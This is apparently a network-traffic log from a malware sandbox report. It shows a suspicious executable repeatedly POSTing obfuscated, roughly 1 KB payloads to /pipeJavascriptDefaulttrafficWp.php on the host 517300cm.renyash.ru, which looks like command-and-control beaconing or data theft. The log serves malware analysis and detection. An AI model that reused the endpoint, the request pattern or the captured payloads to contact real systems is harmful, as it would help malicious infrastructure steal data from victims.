Jan 9, 2025 18:12:48.582428932 CET	814	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2Bq7%2Feu8Tfk550%2FqyPQtPBLzX%2Fp0TEj%2BEi469Bxv745fkSP6FULktqCzohYyL5D1C7DWHbhsssoK7Fs8FpbF1d3cLqANOWwABfuMKKE%2FttbzWQCOi%2BuUZqZ4YKD%2B6yre9jFPBqwT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60de33817436a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4470&min_rtt=1772&rtt_var=6061&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=62497&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49780	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:48.716856003 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:49.065423012 CET	1012	OUT	Data Raw: 50 53 5e 5e 5d 43 50 57 59 58 51 54 5b 52 57 57 5f 52 58 58 52 53 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS^^]CPWYXQT[RWW_RXXRSZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[+0*7"Y>3;[-8( 6$),W6=&1 "28+[4?7Y('\"/Y.
Jan 9, 2025 18:12:49.269059896 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:49.534535885 CET	813	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kipfMCDtvLtp6BuW6iijwBne63%2BetcHK1C%2BuCss%2BVpl%2B0OuG8KEjt5yPFBJsVdkBWJmaEhD0xrfMI894jqeDDCej1AgQqK2Jq2Te%2FAUVQd4%2BN0QGFrrkfqFvgNOjRXqBg%2B4vUXJY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60debabd65e74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4558&min_rtt=3481&rtt_var=3459&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=120681&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49781	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:49.663618088 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:50.018621922 CET	1012	OUT	Data Raw: 50 5f 5b 5e 58 46 55 52 59 58 51 54 5b 56 57 50 5f 55 58 55 52 5f 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_[^XFURYXQT[VWP_UXUR_ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Z)#9#>=0</ 5 8S!>>&>2 ;\('\"/Y.,
Jan 9, 2025 18:12:50.169878006 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:50.434876919 CET	804	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cxI5U9NezW4KGYZzhF1oijgSKg2RLRLt7lRRtVnjggtF3HOzQOYUiUGLZpYWyYvANGiFOkm8h8rImwBQ4NRvhIrXN4MPDnu6mKUTi78DWp44wieF%2B7ur%2BXRGN2ZpPCx4W8VxPY%2Fp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60df148fa43a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6130&min_rtt=1730&rtt_var=9450&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=39527&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49782	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:50.573153019 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49783	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:50.915551901 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:51.276743889 CET	1292	OUT	Data Raw: 55 54 5b 54 58 45 55 53 59 58 51 54 5b 52 57 50 5f 5c 58 5e 52 52 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UT[TXEUSYXQT[RWP_\X^RRZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#>3-X Z9=3;;7["57Z)!%#-2Y ;^+:'\"/Y.
Jan 9, 2025 18:12:51.328336000 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:51.674756050 CET	954	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLT9S2w9sdymD25b13G3LaYYuOeNER35DMOq%2FfCpCTNe2PlOz%2FnbA3BUPMO9IRbF0eH8KmERhY4G8YuU3e4lGcRVbkcabjIumRySrXzrCnND8oekOq%2FA0JZaArzz7BgxFYXeBWME"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60df888f4433d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3538&min_rtt=2239&rtt_var=3438&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=115561&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 1a 32 0b 2f 53 30 3c 23 1e 31 31 3e 0f 21 0f 0f 01 2f 10 23 19 37 29 24 07 38 0b 3e 01 22 59 27 16 24 0b 31 19 26 02 20 08 23 36 21 5d 01 12 27 02 30 29 31 00 30 2d 28 5f 26 2b 30 1c 23 10 28 5b 26 3b 07 0a 31 0d 33 0c 36 3d 3e 08 2a 2e 3e 05 2c 06 3f 04 2f 37 37 03 3c 39 2b 51 0e 10 22 51 24 04 22 5e 28 2d 33 1f 24 32 34 1e 29 2f 2f 59 32 05 28 55 28 3a 38 10 33 5f 23 00 20 06 3c 5e 2a 3a 3c 10 30 38 00 0e 29 12 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!2/S0<#11>!/#7)$8>"Y'$1& #6!]'0)10-(_&+0#([&;136=>.>,?/77<9+Q"Q$"^(-3$24)//Y2(U(:83_# <^:<08) \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49784	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:51.186444044 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:51.534425974 CET	1012	OUT	Data Raw: 50 51 5e 59 5d 40 55 50 59 58 51 54 5b 52 57 5c 5f 57 58 58 52 58 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ^Y]@UPYXQT[RW\_WXXRXZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#=067Z:)0'/;/"%'=36=U&V-S&+4!/<?'\"/Y.
Jan 9, 2025 18:12:51.628030062 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:51.896862984 CET	812	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktdoOkkw4MhA%2FhNIS9VLpr2tdJSOUtMibZ2QCEWOQcjp3%2B9LAauaDyaW%2FmWSEo%2B2LqvpbgMO1%2F%2BRrSgxeI6LyzvJ9AQj45N1Xo59zJZzzBj13ldYXl5vJk7e14N%2FwzTfIKy7ZpU5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60dfa68268cbd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4921&min_rtt=1973&rtt_var=6637&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=57111&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49785	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:52.020200014 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:12:52.378356934 CET	1012	OUT	Data Raw: 50 52 5b 55 58 42 50 54 59 58 51 54 5b 57 57 50 5f 54 58 5f 52 5a 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[UXBPTYXQT[WWP_TX_RZZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z +0=] Z=)U4-;/\#$)*!=R&V91;#,$?:'\"/Y.(
Jan 9, 2025 18:12:52.499814034 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:52.923947096 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcnY5Ftg8gV%2BAnD3kiDMrCjxVdcIS3GXz7jFENTxEa9SmUgkC57%2F41g6owfzRgGLZosNiCzyEW04ffRxXehsxvlyno1V%2FhdlEHUOK3jDnwPZxNkYaVPWeUcKrpMS6Nn0s4H2q%2BWn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60dffd8e84267-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7512&min_rtt=1632&rtt_var=12373&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=29994&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49787	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:53.052731037 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:53.409167051 CET	1012	OUT	Data Raw: 55 57 5e 58 58 43 55 56 59 58 51 54 5b 5d 57 54 5f 54 58 5c 52 52 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UW^XXCUVYXQT[]WT_TX\RRZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)3.4?.* ,(4C7\>*$W652V"1+3X!<(+'\"/Y.
Jan 9, 2025 18:12:53.498039961 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:53.739852905 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dg4G4RMD7%2BDo0nNOFdqKVdKAak4VMQFYakpo2AqRqA8KPz17c1Al6VwFzAPnoS2zR2z%2FhJy01hJz4BLC%2BatBfRN2puCifLnMtReChXJRfk75wGeBvAtT2wtxSZz6UBmpDOx2LZgv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e061ab418b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1461&rtt_var=1397&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=300535&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49788	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:54.109334946 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:54.456077099 CET	1012	OUT	Data Raw: 50 5f 5e 5e 5d 45 55 5e 59 58 51 54 5b 5d 57 51 5f 56 58 54 52 5b 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_^^]EU^YXQT[]WQ_VXTR[ZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z *3!_72_),]77^>)8"=20-W%7X 7X?'\"/Y.
Jan 9, 2025 18:12:54.575046062 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:54.851934910 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeYNavhsXJYSsqEOKAQoAwJ262AuDYMYMGw%2FKKYTMAZZhKQ2SdaFI3G67QRmvHLHFqOFTThdF1iFlPGUqFECr%2FLYzRQ4SIc7DptXO5Q8FL7roWB1fnvMG1sMI6yRy%2FmL8%2Ffhav45"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e0cceb942ca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4608&min_rtt=2211&rtt_var=5624&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=68253&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49789	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:54.974834919 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:55.331338882 CET	1012	OUT	Data Raw: 55 52 5e 5e 5d 42 50 50 59 58 51 54 5b 57 57 51 5f 57 58 5b 52 58 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR^^]BPPYXQT[WWQ_WX[RXZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X>#%_ ?>)3'\8 4+)5.%T19W2?X!/7^?'\"/Y.(
Jan 9, 2025 18:12:55.456799030 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:55.704859018 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPqf0tgSJ4MGS%2F%2FjaSnm5lvjsvHepo8uQ4jeA%2BjlTweDJK9n3qSloyJs7SAlPMj%2FJRQHrE4qwUcpnu0%2BnhNl5igIOC%2FR%2F4DwXKdOjv83f16y3mGOsoVPad8UNw4mSdXFbluTLuim"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e125c4c420d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3853&min_rtt=2227&rtt_var=4087&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=95825&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:12:55.795664072 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49791	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:55.926630974 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:56.284194946 CET	1012	OUT	Data Raw: 50 52 5b 5c 58 44 55 51 59 58 51 54 5b 51 57 5d 5f 51 58 5e 52 5b 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[\XDUQYXQT[QW]_QX^R[ZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z =0! ,_?3'/87_+ T6[)S%0R1(;!<<('\"/Y.0
Jan 9, 2025 18:12:56.398425102 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:56.661745071 CET	810	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2F6mvuaaZPysU7kA9Obkh3%2FYRGN0B6MRWL6T96QR%2FltmHGRAsEBu4QcY7B5FDXn9oZYQcTS6Mb5QDNqgGff8VkeViSB7Bl7uSBb9UWOHllHs%2BQ8CF2%2Fh9jJ0En%2BKlxp9r2bK5uxT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e183e650c82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4664&min_rtt=1628&rtt_var=6682&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=56333&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49797	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:56.696909904 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1264 Expect: 100-continue Connection: Keep-Alive
